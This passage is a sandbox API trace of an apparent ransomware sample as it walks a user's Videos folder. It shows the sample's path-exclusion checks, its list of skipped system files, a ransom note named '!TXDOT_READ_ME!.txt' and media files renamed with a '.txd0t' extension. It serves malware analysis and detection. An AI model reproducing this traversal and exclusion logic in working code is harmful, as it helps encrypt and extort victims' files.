0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\boot\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\perflogs\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\programdata\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\drivers\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\wsus\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="crypt_detect") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="cryptolocker") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="ransomware") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\WINDOWS") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files") returned 0x0 [0119.920] GetProcessHeap () returned 0xe30000 [0119.920] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e0) returned 0xed90d0 [0119.920] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.920] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\*", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*" [0119.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0119.920] StrCmpW (psz1=".", psz2=".") returned 0 [0119.920] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.920] StrCmpW (psz1="..", psz2=".") returned 1 [0119.920] StrCmpW (psz1="..", psz2="..") returned 0 [0119.920] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ad7ba6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52ad7ba6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ad7ba6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.921] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.921] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.921] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt" [0119.921] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.921] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.921] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1444bf50, ftCreationTime.dwHighDateTime=0x1d5eec7, ftLastAccessTime.dwLowDateTime=0x93065290, ftLastAccessTime.dwHighDateTime=0x1d5ec33, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x32d4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6HAlI.avi.txd0t", cAlternateFileName="6HALIA~1.TXD")) returned 1 [0119.921] StrCmpW (psz1="6HAlI.avi.txd0t", psz2=".") returned 1 [0119.921] StrCmpW (psz1="6HAlI.avi.txd0t", psz2="..") returned 1 [0119.921] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="6HAlI.avi.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t" [0119.921] PathFindExtensionW (pszPath="6HAlI.avi.txd0t") returned=".txd0t" [0119.921] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.921] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78b7cd0, ftCreationTime.dwHighDateTime=0x1d5e7fe, ftLastAccessTime.dwLowDateTime=0xa87fd220, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x52ad7ba6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18789, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8aR-oZ.mp4.txd0t", cAlternateFileName="8AR-OZ~1.TXD")) returned 1 [0119.921] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2=".") returned 1 [0119.921] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2="..") returned 1 [0119.921] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0119.921] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="8aR-oZ.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t" [0119.922] PathFindExtensionW (pszPath="8aR-oZ.mp4.txd0t") returned=".txd0t" [0119.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.922] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cf16450, ftCreationTime.dwHighDateTime=0x1d5ebab, ftLastAccessTime.dwLowDateTime=0x8698a780, ftLastAccessTime.dwHighDateTime=0x1d5e18c, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5335, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hrFHHxEDNXCX.swf.txd0t", cAlternateFileName="HRFHHX~1.TXD")) returned 1 [0119.922] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2=".") returned 1 [0119.922] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2="..") returned 1 [0119.922] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.922] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0119.922] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="hrFHHxEDNXCX.swf.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t" [0119.922] PathFindExtensionW (pszPath="hrFHHxEDNXCX.swf.txd0t") returned=".txd0t" [0119.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.922] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12184, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4.txd0t", cAlternateFileName="P6NTF9~1.TXD")) returned 1 [0119.922] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2=".") returned 1 [0119.922] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2="..") returned 1 [0119.922] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.922] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0119.922] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="P6NtF9p_sziw.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t" [0119.922] PathFindExtensionW (pszPath="P6NtF9p_sziw.mp4.txd0t") returned=".txd0t" [0119.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.922] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0x52afeefb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12184, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4.txd0t", cAlternateFileName="P6NTF9~1.TXD")) returned 0 [0119.922] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0119.922] GetProcessHeap () returned 0xe30000 [0119.922] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.922] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 0 [0119.922] FindClose (in: hFindFile=0xec1cf0 | out: hFindFile=0xec1cf0) returned 1 [0119.922] GetProcessHeap () returned 0xe30000 [0119.922] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.922] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5dd49c0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x681af900, ftLastAccessTime.dwHighDateTime=0x1d5efa8, ftLastWriteTime.dwLowDateTime=0x52dd2c43, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c03, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="e7C5rm59mT0uP_9f.avi.txd0t", cAlternateFileName="E7C5RM~1.TXD")) returned 1 [0119.922] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2=".") returned 1 [0119.922] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2="..") returned 1 [0119.922] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.922] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="e7C5rm59mT0uP_9f.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t" [0119.923] PathFindExtensionW (pszPath="e7C5rm59mT0uP_9f.avi.txd0t") returned=".txd0t" [0119.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.923] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1259ab0, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0x18935990, ftLastAccessTime.dwHighDateTime=0x1d5e23d, ftLastWriteTime.dwLowDateTime=0x52df8d7e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a26, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="gPsXouAw.flv.txd0t", cAlternateFileName="GPSXOU~1.TXD")) returned 1 [0119.923] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2=".") returned 1 [0119.923] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2="..") returned 1 [0119.923] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="gPsXouAw.flv.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t" [0119.923] PathFindExtensionW (pszPath="gPsXouAw.flv.txd0t") returned=".txd0t" [0119.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.923] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cb156b0, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0xd911ff70, ftLastAccessTime.dwHighDateTime=0x1d5eb64, ftLastWriteTime.dwLowDateTime=0x52df8d7e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15169, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GsXmIOztESVB3CY.mp4.txd0t", cAlternateFileName="GSXMIO~1.TXD")) returned 1 [0119.923] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2=".") returned 1 [0119.923] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2="..") returned 1 [0119.923] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="GsXmIOztESVB3CY.mp4.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t" [0119.923] PathFindExtensionW (pszPath="GsXmIOztESVB3CY.mp4.txd0t") returned=".txd0t" [0119.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.923] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c650b0, ftCreationTime.dwHighDateTime=0x1d5e2a5, ftLastAccessTime.dwLowDateTime=0xfc35a200, ftLastAccessTime.dwHighDateTime=0x1d5ea0f, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x21c8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="JbkR3ATa90b5U.avi.txd0t", cAlternateFileName="JBKR3A~1.TXD")) returned 1 [0119.923] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2=".") returned 1 [0119.923] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2="..") returned 1 [0119.923] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="JbkR3ATa90b5U.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t" [0119.923] PathFindExtensionW (pszPath="JbkR3ATa90b5U.avi.txd0t") returned=".txd0t" [0119.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.923] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ofxv0mmpKK_", cAlternateFileName="OFXV0M~1")) returned 1 [0119.923] StrCmpW (psz1="ofxv0mmpKK_", psz2=".") returned 1 [0119.923] StrCmpW (psz1="ofxv0mmpKK_", psz2="..") returned 1 [0119.923] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="ofxv0mmpKK_", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system32\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\local\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\boot\\") returned 0x0 [0119.924] StrStrIW 